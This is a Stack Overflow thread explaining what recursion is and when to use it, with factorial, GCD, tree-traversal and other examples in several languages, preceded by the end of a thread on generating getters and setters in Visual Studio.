A: Use the propfull keyword.
It will generate a property and a variable.
Type the keyword propfull in the editor, followed by two TABs. It will generate code like:
private data_type var_name;

public data_type var_name1
{
    get { return var_name; }
    set { var_name = value; }
}
Video demonstrating the use of snippet 'propfull' (among other things), at 4 min 11 secs.
A: In visual studio 2019, select your properties like this:
Then press Ctrl+r
Then press Ctrl+e
A dialog will appear showing you the preview of the changes that are going to happen to your code. If everything looks good (which it mostly will), press OK.
A: In addition to the 'prop' snippet and auto-properties, there is a refactor option to let you select an existing field and expose it via a property (right click on the field → Refactor → Encapsulate Field...).
Also, if you don't like the 'prop' implementation, you can create your own snippets. Additionally, a third-party refactoring tool like ReSharper will give you even more features and make it easier to create more advanced snippets. I'd recommend ReSharper if you can afford it.
*
*http://msdn.microsoft.com/en-us/library/f7d3wz0k(VS.80).aspx
*Video demonstrating the use of snippet 'prop' (among other things), at 3 min 23 secs.
A: I don't have Visual Studio installed on my machine anymore (and I'm using Linux), but I do remember that there was an wizard hidden somewhere inside one of the menus that gave access to a class builder.
With this wizard, you could define all your classes' details, including methods and attributes. If I remember well, there was an option through which you could ask Visual Studio to create the setters and getters automatically for you.
I know it's quite vague, but check it out and you might find it.
A:
Apart from Visual Studio's own tooling, we can easily generate C# properties using an online tool called "C# property generator".
A: First, get the extension: just press Ctrl + Shift + X and install a getter/setter extension.
After this, just select your variable and right-click. Go to Command Palette...
...and type "getter". It will suggest generating the get and set methods. Click on it...
A: I personally use Ctrl + . and then select "Encapsulate field".
That's a shortcut for this option (How can we generate getters and setters in Visual Studio?).
*
*I marked the shortcut for auto-choosing the refactoring (Ctrl + .)
A: Just press Alt + Ins in Android Studio.
After declaring variables, you will get the getters and setters in the generated code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3017",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "257"
} |
Q: What is recursion and when should I use it? One of the topics that seems to come up regularly on mailing lists and online discussions is the merits (or lack thereof) of doing a Computer Science Degree. An argument that seems to come up time and again for the negative party is that they have been coding for some number of years and they have never used recursion.
So the question is:
*
*What is recursion?
*When would I use recursion?
*Why don't people use recursion?
A: Recursion refers to a method which solves a problem by solving a smaller version of the problem and then using that result plus some other computation to formulate the answer to the original problem. Often times, in the process of solving the smaller version, the method will solve a yet smaller version of the problem, and so on, until it reaches a "base case" which is trivial to solve.
For instance, to calculate a factorial for the number X, one can represent it as X times the factorial of X-1. Thus, the method "recurses" to find the factorial of X-1, and then multiplies whatever it got by X to give a final answer. Of course, to find the factorial of X-1, it'll first calculate the factorial of X-2, and so on. The base case would be when X is 0 or 1, in which case it knows to return 1 since 0! = 1! = 1.
A: Consider an old, well known problem:
In mathematics, the greatest common divisor (gcd) … of two or more non-zero integers, is the largest positive integer that divides the numbers without a remainder.
The definition of gcd is surprisingly simple:
gcd(m, n) = m if n = 0
gcd(m, n) = gcd(n, m mod n) if n > 0
where mod is the modulo operator (that is, the remainder after integer division).
In English, this definition says the greatest common divisor of any number and zero is that number, and the greatest common divisor of two numbers m and n is the greatest common divisor of n and the remainder after dividing m by n.
If you'd like to know why this works, see the Wikipedia article on the Euclidean algorithm.
Let's compute gcd(10, 8) as an example. Each step is equal to the one just before it:
*
*gcd(10, 8)
*gcd(8, 10 mod 8)
*gcd(8, 2)
*gcd(2, 8 mod 2)
*gcd(2, 0)
*2
In the first step, 8 does not equal zero, so the second part of the definition applies. 10 mod 8 = 2 because 8 goes into 10 once with a remainder of 2. At step 3, the second part applies again, but this time 8 mod 2 = 0 because 2 divides 8 with no remainder. At step 5, the second argument is 0, so the answer is 2.
Did you notice that gcd appears on both the left and right sides of the equals sign? A mathematician would say this definition is recursive because the expression you're defining recurs inside its definition.
Recursive definitions tend to be elegant. For example, a recursive definition for the sum of a list is
sum l =
    if empty(l)
        return 0
    else
        return head(l) + sum(tail(l))
where head is the first element in a list and tail is the rest of the list. Note that sum recurs inside its definition at the end.
Maybe you'd prefer the maximum value in a list instead:
max l =
    if empty(l)
        error
    elsif length(l) = 1
        return head(l)
    else
        tailmax = max(tail(l))
        if head(l) > tailmax
            return head(l)
        else
            return tailmax
You might define multiplication of non-negative integers recursively to turn it into a series of additions:
a * b =
    if b = 0
        return 0
    else
        return a + (a * (b - 1))
If that bit about transforming multiplication into a series of additions doesn't make sense, try expanding a few simple examples to see how it works.
Merge sort has a lovely recursive definition:
sort(l) =
    if empty(l) or length(l) = 1
        return l
    else
        (left,right) = split l
        return merge(sort(left), sort(right))
Recursive definitions are all around if you know what to look for. Notice how all of these definitions have very simple base cases, e.g., gcd(m, 0) = m. The recursive cases whittle away at the problem to get down to the easy answers.
With this understanding, you can now appreciate the other algorithms in Wikipedia's article on recursion!
A: There are a number of good explanations of recursion in this thread; this answer is about why you shouldn't use it in most languages.* In the majority of major imperative language implementations (i.e. every major implementation of C, C++, Basic, Python, Ruby, Java, and C#) iteration is vastly preferable to recursion.
To see why, walk through the steps that the above languages use to call a function:
*
*space is carved out on the stack for the function's arguments and local variables
*the function's arguments are copied into this new space
*control jumps to the function
*the function's code runs
*the function's result is copied into a return value
*the stack is rewound to its previous position
*control jumps back to where the function was called
Doing all of these steps takes time, usually a little bit more than it takes to iterate through a loop. However, the real problem is in step #1. When many programs start, they allocate a single chunk of memory for their stack, and when they run out of that memory (often, but not always due to recursion), the program crashes due to a stack overflow.
So in these languages recursion is slower and it makes you vulnerable to crashing. There are still some arguments for using it though. In general, code written recursively is shorter and a bit more elegant, once you know how to read it.
There is a technique that language implementers can use called tail call optimization which can eliminate some classes of stack overflow. Put succinctly: if a function's return expression is simply the result of a function call, then you don't need to add a new level onto the stack, you can reuse the current one for the function being called. Regrettably, few imperative language-implementations have tail-call optimization built in.
* I love recursion. My favorite static language doesn't use loops at all, recursion is the only way to do something repeatedly. I just don't think that recursion is generally a good idea in languages that aren't tuned for it.
** By the way Mario, the typical name for your ArrangeString function is "join", and I'd be surprised if your language of choice doesn't already have an implementation of it.
A: *
*A function that calls itself
*When a function can be (easily) decomposed into a simple operation plus the same function on some smaller portion of the problem. I should say, rather, that this makes it a good candidate for recursion.
*They do!
The canonical example is the factorial which looks like:
int fact(int a)
{
    if (a <= 1)   // base case (also guards fact(0))
        return 1;
    return a * fact(a - 1);
}
In general, recursion isn't necessarily fast (function call overhead tends to be high because recursive functions tend to be small, see above) and can suffer from some problems (stack overflow anyone?). Some say they tend to be hard to get 'right' in non-trivial cases but I don't really buy into that. In some situations, recursion makes the most sense and is the most elegant and clear way to write a particular function. It should be noted that some languages favor recursive solutions and optimize them much more (LISP comes to mind).
A: Simple english example of recursion.
A child couldn't sleep, so her mother told her a story about a little frog,
who couldn't sleep, so the frog's mother told her a story about a little bear,
who couldn't sleep, so the bear's mother told her a story about a little weasel...
who fell asleep.
...and the little bear fell asleep;
...and the little frog fell asleep;
...and the child fell asleep.
A: A recursive function is one which calls itself. The most common reason I've found to use it is traversing a tree structure. For example, if I have a TreeView with checkboxes (think installation of a new program, "choose features to install" page), I might want a "check all" button which would be something like this (pseudocode):
function cmdCheckAllClick {
    checkRecursively(TreeView1.RootNode);
}
function checkRecursively(Node n) {
    n.Checked = True;
    foreach ( n.Children as child ) {
        checkRecursively(child);
    }
}
So you can see that the checkRecursively first checks the node which it is passed, then calls itself for each of that node's children.
You do need to be a bit careful with recursion. If you get into an infinite recursive loop, you will get a Stack Overflow exception :)
I can't think of a reason why people shouldn't use it, when appropriate. It is useful in some circumstances, and not in others.
I think that because it's an interesting technique, some coders perhaps end up using it more often than they should, without real justification. This has given recursion a bad name in some circles.
A: Recursion is an expression directly or indirectly referencing itself.
Consider recursive acronyms as a simple example:
*
*GNU stands for GNU's Not Unix
*PHP stands for PHP: Hypertext Preprocessor
*YAML stands for YAML Ain't Markup Language
*WINE stands for Wine Is Not an Emulator
*VISA stands for Visa International Service Association
More examples on Wikipedia
A: In the most basic computer science sense, recursion is a function that calls itself. Say you have a linked list structure:
struct Node {
    Node* next;
};
And you want to find out how long a linked list is, you can do this with recursion:
int length(const Node* list) {
    if (!list) {
        return 0; // base case: the empty list has length zero
    } else {
        return 1 + length(list->next);
    }
}
(This could of course be done with a for loop as well, but is useful as an illustration of the concept)
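For comparison, here is a sketch of the same function written with that loop, assuming the null-terminated Node list above:
int length_iterative(const Node* list) {
    int count = 0;
    for (const Node* p = list; p != nullptr; p = p->next)
        ++count; // one loop step per node instead of one stack frame per node
    return count;
}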
A: Whenever a function calls itself, creating a loop, then that's recursion. As with anything there are good uses and bad uses for recursion.
The most simple example is tail recursion where the very last line of the function is a call to itself:
int FloorByTen(int num)
{
    if (num % 10 == 0)
        return num;
    else
        return FloorByTen(num - 1);
}
However, this is a lame, almost pointless example because it can easily be replaced by more efficient iteration. After all, recursion suffers from function call overhead, which in the example above could be substantial compared to the operation inside the function itself.
So the whole reason to do recursion rather than iteration should be to take advantage of the call stack to do some clever stuff. For example, if you call a function multiple times with different parameters inside the same loop then that's a way to accomplish branching. A classic example is the Sierpinski triangle.
You can draw one of those very simply with recursion, where the call stack branches in 3 directions:
private void BuildVertices(double x, double y, double len)
{
    if (len > 0.002)
    {
        mesh.Positions.Add(new Point3D(x, y + len, -len));
        mesh.Positions.Add(new Point3D(x - len, y - len, -len));
        mesh.Positions.Add(new Point3D(x + len, y - len, -len));
        len *= 0.5;
        BuildVertices(x, y + len, len);
        BuildVertices(x - len, y - len, len);
        BuildVertices(x + len, y - len, len);
    }
}
If you attempt to do the same thing with iteration I think you'll find it takes a lot more code to accomplish.
Other common use cases might include traversing hierarchies, e.g. website crawlers, directory comparisons, etc.
Conclusion
In practical terms, recursion makes the most sense whenever you need iterative branching.
A: Recursion works best with what I like to call "fractal problems", where you're dealing with a big thing that's made of smaller versions of that big thing, each of which is an even smaller version of the big thing, and so on. If you ever have to traverse or search through something like a tree or nested identical structures, you've got a problem that might be a good candidate for recursion.
People avoid recursion for a number of reasons:
*
*Most people (myself included) cut their programming teeth on procedural or object-oriented programming as opposed to functional programming. To such people, the iterative approach (typically using loops) feels more natural.
*Those of us who cut our programming teeth on procedural or object-oriented programming have often been told to avoid recursion because it's error prone.
*We're often told that recursion is slow. Calling and returning from a routine repeatedly involves a lot of stack pushing and popping, which is slower than looping. I think some languages handle this better than others, and those languages are most likely not those where the dominant paradigm is procedural or object-oriented.
*For at least a couple of programming languages I've used, I remember hearing recommendations not to use recursion if it gets beyond a certain depth because its stack isn't that deep.
A: Here's a simple example: how many elements in a set. (there are better ways to count things, but this is a nice simple recursive example.)
First, we need two rules:
*
*if the set is empty, the count of items in the set is zero (duh!).
*if the set is not empty, the count is one plus the number of items in the set after one item is removed.
Suppose you have a set like this: [x x x]. let's count how many items there are.
*
*the set is [x x x] which is not empty, so we apply rule 2. the number of items is one plus the number of items in [x x] (i.e. we removed an item).
*the set is [x x], so we apply rule 2 again: one + number of items in [x].
*the set is [x], which still matches rule 2: one + number of items in [].
*Now the set is [], which matches rule 1: the count is zero!
*Now that we know the answer in step 4 (0), we can solve step 3 (1 + 0)
*Likewise, now that we know the answer in step 3 (1), we can solve step 2 (1 + 1)
*And finally now that we know the answer in step 2 (2), we can solve step 1 (1 + 2) and get the count of items in [x x x], which is 3. Hooray!
We can represent this as:
count of [x x x] = 1 + count of [x x]
= 1 + (1 + count of [x])
= 1 + (1 + (1 + count of []))
= 1 + (1 + (1 + 0)))
= 1 + (1 + (1))
= 1 + (2)
= 3
When applying a recursive solution, you usually have at least 2 rules:
*
*the basis, the simple case which states what happens when you have "used up" all of your data. This is usually some variation of "if you are out of data to process, your answer is X"
*the recursive rule, which states what happens if you still have data. This is usually some kind of rule that says "do something to make your data set smaller, and reapply your rules to the smaller data set."
If we translate the above to pseudocode, we get:
numberOfItems(set)
    if set is empty
        return 0
    else
        remove 1 item from set
        return 1 + numberOfItems(set)
There's a lot more useful examples (traversing a tree, for example) which I'm sure other people will cover.
A: I like this definition:
In recursion, a routine solves a small part of a problem itself, divides the problem into smaller pieces, and then calls itself to solve each of the smaller pieces.
I also like Steve McConnell's discussion of recursion in Code Complete, where he criticises the examples used in Computer Science books on recursion.
Don't use recursion for factorials or Fibonacci numbers
One problem with computer-science textbooks is that they present silly examples of recursion. The typical examples are computing a factorial or computing a Fibonacci sequence. Recursion is a powerful tool, and it's really dumb to use it in either of those cases. If a programmer who worked for me used recursion to compute a factorial, I'd hire someone else.
I thought this was a very interesting point to raise and may be a reason why recursion is often misunderstood.
EDIT:
This was not a dig at Dav's answer - I had not seen that reply when I posted this
A: A recursive statement is one in which you define the process of what to do next as a combination of the inputs and what you have already done.
For example, take factorial:
factorial(6) = 6*5*4*3*2*1
But it's easy to see factorial(6) also is:
6 * factorial(5) = 6*(5*4*3*2*1).
So generally:
factorial(n) = n*factorial(n-1)
Of course, the tricky thing about recursion is that if you want to define things in terms of what you have already done, there needs to be some place to start.
In this example, we just make a special case by defining factorial(1) = 1.
Now we see it from the bottom up:
factorial(6) = 6*factorial(5)
             = 6*5*factorial(4)
             = 6*5*4*factorial(3)
             = 6*5*4*3*factorial(2)
             = 6*5*4*3*2*factorial(1)
             = 6*5*4*3*2*1
Since we defined factorial(1) = 1, we reach the "bottom".
Generally speaking, recursive procedures have two parts:
1) The recursive part, which defines some procedure in terms of new inputs combined with what you've "already done" via the same procedure. (i.e. factorial(n) = n*factorial(n-1))
2) A base part, which makes sure that the process doesn't repeat forever by giving it some place to start (i.e. factorial(1) = 1)
It can be a bit confusing to get your head around at first, but just look at a bunch of examples and it should all come together. If you want a much deeper understanding of the concept, study mathematical induction. Also, be aware that some languages optimize for recursive calls while others do not. It's pretty easy to make insanely slow recursive functions if you're not careful, but there are also techniques to make them performant in most cases.
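For example, one common technique is rewriting the function in tail form with an accumulator, so the recursive call is the last thing that happens and an implementation that optimizes tail calls can reuse the stack frame. A sketch in C# (note that the .NET JIT does not guarantee this optimization):
// Tail-recursive factorial: the running product travels in an
// accumulator, so the recursive call is in tail position.
static long Factorial(int n, long acc = 1)
{
    if (n <= 1)
        return acc;                       // base case: acc holds the answer
    return Factorial(n - 1, acc * n);     // tail call
}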
Hope this helps...
A: 1.)
A method is recursive if it can call itself; either directly:
void f() {
    ... f() ...
}
or indirectly:
void f() {
    ... g() ...
}
void g() {
    ... f() ...
}
2.) When to use recursion
Q: Does using recursion usually make your code faster?
A: No.
Q: Does using recursion usually use less memory?
A: No.
Q: Then why use recursion?
A: It sometimes makes your code much simpler!
3.) People use recursion only when it is very complex to write iterative code. For example, tree traversal techniques like preorder, postorder can be made both iterative and recursive. But usually we use recursive because of its simplicity.
A: Well, that's a pretty decent definition you have. And wikipedia has a good definition too. So I'll add another (probably worse) definition for you.
When people refer to "recursion", they're usually talking about a function they've written which calls itself repeatedly until it is done with its work. Recursion can be helpful when traversing hierarchies in data structures.
A: An example: A recursive definition of a staircase is:
A staircase consists of:
- a single step and a staircase (recursion)
- or only a single step (termination)
A: Recursion is a method of solving problems based on the divide and conquer mentality.
The basic idea is that you take the original problem and divide it into smaller (more easily solved) instances of itself, solve those smaller instances (usually by using the same algorithm again) and then reassemble them into the final solution.
The canonical example is a routine to generate the Factorial of n. The Factorial of n is calculated by multiplying all of the numbers between 1 and n. An iterative solution in C# looks like this:
public int Fact(int n)
{
    int fact = 1;
    for (int i = 2; i <= n; i++)
    {
        fact = fact * i;
    }
    return fact;
}
There's nothing surprising about the iterative solution and it should make sense to anyone familiar with C#.
The recursive solution is found by recognising that the nth Factorial is n * Fact(n-1). Or to put it another way, if you know what a particular Factorial number is you can calculate the next one. Here is the recursive solution in C#:
public int FactRec(int n)
{
    if (n < 2)
    {
        return 1;
    }
    return n * FactRec(n - 1);
}
The first part of this function is known as a Base Case (or sometimes Guard Clause) and is what prevents the algorithm from running forever. It just returns the value 1 whenever the function is called with a value of 1 or less. The second part is more interesting and is known as the Recursive Step. Here we call the same method with a slightly modified parameter (we decrement it by 1) and then multiply the result with our copy of n.
When first encountered this can be kind of confusing so it's instructive to examine how it works when run. Imagine that we call FactRec(5). We enter the routine, are not picked up by the base case and so we end up like this:
// In FactRec(5)
return 5 * FactRec( 5 - 1 );
// which is
return 5 * FactRec(4);
If we re-enter the method with the parameter 4 we are again not stopped by the guard clause and so we end up at:
// In FactRec(4)
return 4 * FactRec(3);
If we substitute this return value into the return value above we get
// In FactRec(5)
return 5 * (4 * FactRec(3));
This should give you a clue as to how the final solution is arrived at so we'll fast track and show each step on the way down:
return 5 * (4 * FactRec(3));
return 5 * (4 * (3 * FactRec(2)));
return 5 * (4 * (3 * (2 * FactRec(1))));
return 5 * (4 * (3 * (2 * (1))));
That final substitution happens when the base case is triggered. At this point we have a simple algebraic formula to solve which equates directly to the definition of Factorials in the first place.
It's instructive to note that every call into the method results in either a base case being triggered or a call to the same method where the parameters are closer to a base case (often called a recursive call). If this is not the case then the method will run forever.
A: To recurse on a solved problem: do nothing, you're done.
To recurse on an open problem: do the next step, then recurse on the rest.
A: In plain English:
Assume you can do 3 things:
*
*Take one apple
*Write down tally marks
*Count tally marks
You have a lot of apples in front of you on a table and you want to know how many apples there are.
start
Is the table empty?
yes: Count the tally marks and cheer like it's your birthday!
no: Take 1 apple and put it aside
Write down a tally mark
goto start
The process of repeating the same thing till you are done is called recursion.
I hope this is the "plain english" answer you are looking for!
A: A recursive function is a function that contains a call to itself. A recursive struct is a struct that contains an instance of itself. You can combine the two as a recursive class. The key part of a recursive item is that it contains an instance/call of itself.
Consider two mirrors facing each other. We've seen the neat infinity effect they make. Each reflection is an instance of a mirror, which is contained within another instance of a mirror, etc. The mirror containing a reflection of itself is recursion.
A binary search tree is a good programming example of recursion. The structure is recursive with each Node containing 2 instances of a Node. Functions to work on a binary search tree are also recursive.
A: This is an old question, but I want to add an answer from a logistical point of view (i.e. not from an algorithm-correctness or performance point of view).
I use Java for work, and Java doesn't support nested functions. As such, if I want to do recursion, I might have to define an external function (which exists only because my code bumps against Java's bureaucratic rules), or I might have to refactor the code altogether (which I really hate to do).
Thus, I often avoid recursion and use an explicit stack instead, because recursion itself is essentially a stack operation.
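As a hedged sketch of that trade-off, here is an iterative pre-order tree walk in Java where an explicit Deque stands in for the call stack (the Node type is hypothetical):
import java.util.ArrayDeque;
import java.util.Deque;

class Node {
    int value;
    Node left, right;
}

class TreeWalker {
    // Pre-order traversal without recursion: the Deque plays the role
    // the call stack would play in the recursive version.
    static void preOrder(Node root) {
        Deque<Node> stack = new ArrayDeque<>();
        if (root != null) stack.push(root);
        while (!stack.isEmpty()) {
            Node current = stack.pop();
            System.out.println(current.value);
            // Push right first so the left subtree is processed first.
            if (current.right != null) stack.push(current.right);
            if (current.left != null) stack.push(current.left);
        }
    }
}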
A: Recursion is solving a problem with a function that calls itself. A good example of this is a factorial function. Factorial is a math problem where factorial of 5, for example, is 5 * 4 * 3 * 2 * 1. This function solves this in C# for positive integers (not tested - there may be a bug).
public int Factorial(int n)
{
if (n <= 1)
return 1;
return n * Factorial(n - 1);
}
A: You want to use it anytime you have a tree structure. It is very useful in reading XML.
A: Recursion as it applies to programming is basically calling a function from inside its own definition (inside itself), with different parameters so as to accomplish a task.
A: "If I have a hammer, make everything look like a nail."
Recursion is a problem-solving strategy for huge problems, where at every step you just "turn 2 small things into one bigger thing," each time with the same hammer.
Example
Suppose your desk is covered with a disorganized mess of 1024 papers. How do you make one neat, clean stack of papers from the mess, using recursion?
*
*Divide: Spread all the sheets out, so you have just one sheet in each "stack".
*Conquer:
*Go around, putting each sheet on top of one other sheet. You now have stacks of 2.
*Go around, putting each 2-stack on top of another 2-stack. You now have stacks of 4.
*Go around, putting each 4-stack on top of another 4-stack. You now have stacks of 8.
*... on and on ...
*You now have one huge stack of 1024 sheets!
Notice that this is pretty intuitive, aside from counting everything (which isn't strictly necessary). You might not go all the way down to 1-sheet stacks, in reality, but you could and it would still work. The important part is the hammer: With your arms, you can always put one stack on top of the other to make a bigger stack, and it doesn't matter (within reason) how big either stack is.
A: It's a way to do things over and over indefinitely such that every option is used.
For example, if you wanted to get all the links on an HTML page, you will want recursion, because when you get all the links on page 1 you will want to get all the links on each of the links found on the first page. Then for each link to a new page you will want those links, and so on... In other words, it is a function that calls itself from inside itself.
When you do this you need a way to know when to stop, or else you will be in an endless loop, so you add an integer param to the function to track the number of cycles.
In C# you will have something like this:
private void FindLinks(string url, int recursionDepth) {
    if (recursionDepth == 0)
    {
        return; // base case: stop descending
    }
    // recursive action here
    foreach (LinkItem i in LinkFinder.Find(url))
    {
        // see what links are being caught...
        lblResults.Text += i.Href + "<BR>";
        FindLinks(i.Href, recursionDepth - 1); // recurse one level deeper
    }
}
A: Recursion is the process where a method calls itself in order to perform a certain task. It reduces redundancy of code. Most recursive functions or methods must have a condition to break the recursive call, i.e. stop it from calling itself if a condition is met; this prevents the creation of an infinite loop. Not all functions are suited to be used recursively.
A: In plain English, recursion means to repeat something again and again.
In programming, one example is calling a function from within itself.
Look at the following example of calculating the factorial of a number:
public int fact(int n)
{
    if (n == 0) return 1;          // base case
    else return n * fact(n - 1);   // recursive step
}
A: Sorry if my opinion agrees with someone else's; I'm just trying to explain recursion in plain English.
Suppose you have three managers: Jack, John and Morgan.
Jack manages 2 programmers, John 3, and Morgan 5.
You are going to give every manager $300 and want to know what it would cost.
The answer is obvious; but what if 2 of Morgan's employees are also managers?
HERE comes the recursion.
You start from the top of the hierarchy. The total cost is $0.
You start with Jack,
then check if he has any managers as employees. If you find any, check if they have any managers as employees, and so on. Add $300 to the total cost every time you find a manager.
When you are finished with Jack, go to John, his employees and then to Morgan.
You never know in advance how many cycles you will go through before getting an answer, though you do know how many managers you have and how big a budget you can spend.
Recursion is a tree, with branches and leaves, called parents and children respectively.
When you use a recursion algorithm, you more or less consciously are building a tree from the data.
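Here is a minimal Java sketch of the manager example; the Employee type and the wiring are just illustrative:
import java.util.List;

class Employee {
    boolean isManager;
    List<Employee> reports; // empty for non-managers

    Employee(boolean isManager, List<Employee> reports) {
        this.isManager = isManager;
        this.reports = reports;
    }
}

class BonusCalculator {
    // Walks the whole hierarchy: $300 for each manager found, at any depth.
    // The recursion bottoms out at employees with no reports (the leaves).
    static int totalBonus(Employee e) {
        int total = e.isManager ? 300 : 0;
        for (Employee report : e.reports) {
            total += totalBonus(report); // recurse into subordinates
        }
        return total;
    }
}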
A: Any algorithm exhibits structural recursion on a datatype if it basically consists of a switch-statement with a case for each case of the datatype.
for example, when you are working on a type
tree = null
| leaf(value:integer)
| node(left: tree, right:tree)
a structural recursive algorithm would have the form
function computeSomething(x : tree) =
if x is null: base case
if x is leaf: do something with x.value
if x is node: do something with x.left,
do something with x.right,
combine the results
this is really the most obvious way to write any algorithm that works on a data structure.
now, when you look at the integers (well, the natural numbers) as defined using the Peano axioms
integer = 0 | succ(integer)
you see that a structural recursive algorithm on integers looks like this
function computeSomething(x : integer) =
if x is 0 : base case
if x is succ(prev) : do something with prev
the too-well-known factorial function is about the most trivial example of
this form.
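For the curious, here is one hedged way to render that tree pseudocode in plain Java; the type names mirror the pseudocode, and the "do something" here is summing the leaf values:
interface Tree { }

class Leaf implements Tree {
    final int value;
    Leaf(int value) { this.value = value; }
}

class Node implements Tree {
    final Tree left, right;
    Node(Tree left, Tree right) { this.left = left; this.right = right; }
}

class TreeSum {
    // One case per shape of the datatype, exactly as in the pseudocode.
    static int sum(Tree t) {
        if (t == null) return 0;                      // base case
        if (t instanceof Leaf) return ((Leaf) t).value;
        Node n = (Node) t;
        return sum(n.left) + sum(n.right);            // combine the results
    }
}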
A: A function calls itself or uses its own definition.
A: Recursion in computing is a technique used to compute a result or side effect following the normal return from a single function (method, procedure or block) invocation.
The recursive function, by definition, must have the ability to invoke itself either directly or indirectly (through other functions), depending on an exit condition or conditions not being met. If an exit condition is met, the particular invocation returns to its caller. This continues until the initial invocation is returned from, at which time the desired result or side effect will be available.
As an example, here's a function to perform the Quicksort algorithm in Scala (copied from the Wikipedia entry for Scala)
def qsort: List[Int] => List[Int] = {
case Nil => Nil
case pivot :: tail =>
val (smaller, rest) = tail.partition(_ < pivot)
qsort(smaller) ::: pivot :: qsort(rest)
}
In this case the exit condition is an empty list.
A: Recursion is technique of defining a function, a set or an algorithm in terms of itself.
For example
n! = n * (n-1) * (n-2) * ... * 3 * 2 * 1
Now it can be defined recursively as:
n! = n * (n-1)! for n >= 1 (with 0! = 1 as the base case)
In programming terms, when a function or method calls itself repeatedly until some specific condition gets satisfied, this process is called recursion. But there must be a terminating condition, and the function or method must not enter an infinite loop.
A: A great many problems can be thought of in two types of pieces:
*
*Base cases, which are elementary things that you can solve by just looking at them, and
*Recursive cases, which build a bigger problem out of smaller pieces (elementary or otherwise).
So what's a recursive function? Well, that's where you have a function that is defined in terms of itself, directly or indirectly. OK, that sounds ridiculous until you realize that it is sensible for the problems of the kind described above: you solve the base cases directly and deal with the recursive cases by using recursive calls to solve the smaller pieces of the problem embedded within.
The truly classic example of where you need recursion (or something that smells very much like it) is when you're dealing with a tree. The leaves of the tree are the base case, and the branches are the recursive case. (In pseudo-C.)
struct Tree {
int leaf;
Tree *leftBranch;
Tree *rightBranch;
};
The simplest way of printing this out in order is to use recursion:
void printTreeInOrder(Tree *tree) {
    if (tree->leftBranch) {
        printTreeInOrder(tree->leftBranch);
    }
    printf("%d\n", tree->leaf);
    if (tree->rightBranch) {
        printTreeInOrder(tree->rightBranch);
    }
}
It's dead easy to see that that's going to work, since it's crystal clear. (The non-recursive equivalent is quite a lot more complex, requiring a stack structure internally to manage the list of things to process.) Well, assuming that nobody's done a circular connection of course.
Mathematically, the trick to showing that recursion is tamed is to focus on finding a metric for the size of the arguments. For our tree example, the easiest metric is the maximum depth of the tree below the current node. At leaves, it's zero. At a branch with only leaves below it, it's one, etc. Then you can simply show that there's a strictly ordered sequence on the size of the arguments that the function is invoked on in order to process the tree; the arguments to the recursive calls are always "lesser" in the sense of the metric than the argument to the overall call. With a strictly decreasing cardinal metric, you're sorted.
It's also possible to have infinite recursion. That's messy and in many languages won't work because the stack blows up. (Where it does work, the language engine must be determining that the function somehow doesn't return and is able therefore to optimize away the keeping of the stack. Tricky stuff in general; tail-recursion is just the most trivial way of doing this.)
A: Recursion is when you have an operation that uses itself. It probably will have a stopping point, otherwise it would go on forever.
Let's say you want to look up a word in the dictionary. You have an operation called "look-up" at your disposal.
Your friend says "I could really spoon up some pudding right now!" You don't know what he means, so you look up "spoon" in the dictionary, and it reads something like this:
Spoon: noun - a utensil with a round scoop at the end.
Spoon: verb - to use a spoon on something
Spoon: verb - to cuddle closely from behind
Now, being that you're really not good with English, this points you in the right direction, but you need more info. So you select "utensil" and "cuddle" to look up for some more information.
Cuddle: verb - to snuggle
Utensil: noun - a tool, often an eating utensil
Hey! You know what snuggling is, and it has nothing to do with pudding. You also know that pudding is something you eat, so it makes sense now. Your friend must want to eat pudding with a spoon.
Okay, okay, this was a very lame example, but it illustrates (perhaps poorly) the two main parts of recursion.
1) It uses itself. In this example, you haven't really looked up a word meaningfully until you understand it, and that might mean looking up more words. This brings us to point two,
2) It stops somewhere. It has to have some kind of base-case. Otherwise, you'd just end up looking up every word in the dictionary, which probably isn't too useful. Our base-case was that you got enough information to make a connection between what you previously did and did not understand.
The traditional example that's given is factorial, where 5 factorial is 1*2*3*4*5 (which is 120). The base case would be 0 (or 1, depending). So, for any whole number n, you do the following
is n equal to 0? return 1
otherwise, return n * (factorial of n-1)
let's do this with the example of 4 (which we know ahead of time is 1*2*3*4 = 24).
factorial of 4 ... is it 0? no, so it must be 4 * factorial of 3
but what's factorial of 3? it's 3 * factorial of 2
factorial of 2 is 2 * factorial of 1
factorial of 1 is 1 * factorial of 0
and we KNOW factorial of 0! :-D it's 1, that's the definition
factorial of 1 is 1 * factorial of 0, which was 1... so 1*1 = 1
factorial of 2 is 2 * factorial of 1, which was 1... so 2*1 = 2
factorial of 3 is 3 * factorial of 2, which was 2... so 3*2 = 6
factorial of 4 (finally!!) is 4 * factorial of 3, which was 6... 4*6 is 24
Factorial is a simple case of "base case, and uses itself".
Now, notice we were still working on factorial of 4 the entire way down... If we wanted factorial of 100, we'd have to go all the way down to 0... which might have a lot of overhead to it. In the same manner, if we find an obscure word to look up in the dictionary, it might take looking up other words and scanning for context clues until we find a connection we're familiar with. Recursive methods can take a long time to work their way through. However, when they're used correctly, and understood, they can make complicated work surprisingly simple.
A: The simplest definition of recursion is "self-reference". A function that refers to itself, i. e. calls itself is recursive. The most important thing to keep in mind, is that a recursive function must have a "base case", i. e. a condition that if true causes it not to call itself, and thus terminate the recursion. Otherwise you will have infinite recursion:
(Image: infinite recursion, http://cart.kolix.de/wp-content/uploads/2009/12/infinite-recursion.jpg)
A: I have created a recursive function to concatenate a list of strings with a separator between them. I use it mostly to create SQL expressions, by passing a list of fields as the 'items' and a 'comma+space' as the separator. Here's the function (It uses some Borland Builder native data types, but can be adapted to fit any other environment):
String ArrangeString(TStringList* items, int position, String separator)
{
    String result;
    result = items->Strings[position];
    if (position < items->Count - 1)  // not at the last item yet: recurse on the rest
        result += separator + ArrangeString(items, position + 1, separator);
    return result;
}
I call it this way:
String columnsList;
columnsList = ArrangeString(columns, 0, ", ");
Imagine you have an array named 'fields' with this data inside it: 'albumName', 'releaseDate', 'labelId'. Then you call the function:
ArrangeString(fields, 0, ", ");
As the function starts to work, the variable 'result' receives the value of the position 0 of the array, which is 'albumName'.
Then it checks if the position it's dealing with is the last one. As it isn't, it concatenates the result with the separator and the result of a function which, oh God, is this same function. But this time, check it out, it calls itself, adding 1 to the position.
ArrangeString(fields, 1, ", ");
It keeps repeating, creating a LIFO pile, until it reaches a point where the position being dealt with IS the last one, so the function returns only the item at that position in the list, not concatenating anymore. Then the pile is concatenated backwards.
Got it? If you don't, I have another way to explain it. :o)
A: I use recursion. What does that have to do with having a CS degree... (which I don't, by the way)
